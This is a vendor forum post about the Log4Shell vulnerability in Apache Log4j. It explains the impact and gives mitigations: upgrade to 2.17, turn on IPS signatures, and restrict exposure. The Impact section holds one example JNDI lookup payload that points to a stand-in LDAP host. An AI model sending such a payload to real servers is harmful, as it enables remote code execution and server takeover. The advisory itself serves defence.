Guard against Log4Shell

zyxel_Lin
zyxel_Lin Posts: 37
First Anniversary
 Freshman Member
edited December 2021 in Security Highlight

What is Vulnerable Log4j Package?

Log4j is an open-source project that is widely used for logging in JAVA. Log4j was found a remote code injection in the version between 2.x.x and 2.14.x. (However, a new exploit for log4j, CVE-2021-45046, was also found in 2.15. We recommend to update to the version 2.17). That allows attackers to send a special-formed command to get the remote shell (Log4shell) easily.

 

Impact

This vulnerability got the highest score (10) in CVSS since the log4j package is widely used and the vulnerability can be executed remotely. If the server is vulnerable, attackers can send commands (such as $jndi:ldap://example.com/a) to the log4j package and get the shell to take over the server. As the host is compromised, the host could be used as a bot, miner or encrypted your important files by ransomware.

 

Zyxel Security Appliances Against for Log4Shell

Zyxel is aware of remote code execution (RCE) vulnerabilities in Apache Log4j and confirms that all its security products are NOT affected [1]. Zyxel ATP/USG FLEX/USG Series firewalls provide multiple layer protection to help you against the attack.

 

Mitigation

1.   On host: Recommend to update to the latest version of Apache Log4j (>=2.17.0).

2.   On Network:

  • To reduce the attack surface, don’t publish the vulnerable applications to Internet unless it's absolutely necessary. Leveraging the VPN technology for remote access to the applications.
  • Update to the latest version of IPS signature and then enable the IPS function to protect your host. If your host uses SSL/TLS transmission, you should also enable SSL inspection for further detection. When the attack comes from the malicious IP address, the IP reputation feature defenses you against the attack from the IP address.
  • Enable DNS filter, URL filter, Content Filter, AntiVirus and Sanbox features can also break the attack chain to avoid further infection.

 

Please refer to the signature information 

ATP/USG FLEX/USG series:

v4.0.x.20211217.0

# Signature ID 131026, 131027 and 131028 are used for CVE-2021-44228.

# Signature ID 131029 and 131030 are used for CVE-2021-45046.

 

Reference

[1] Zyxel security advisory for Apache Log4j RCE vulnerabilities, https://www.zyxel.com/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml

 

Revision history

2021-12-17: Initial release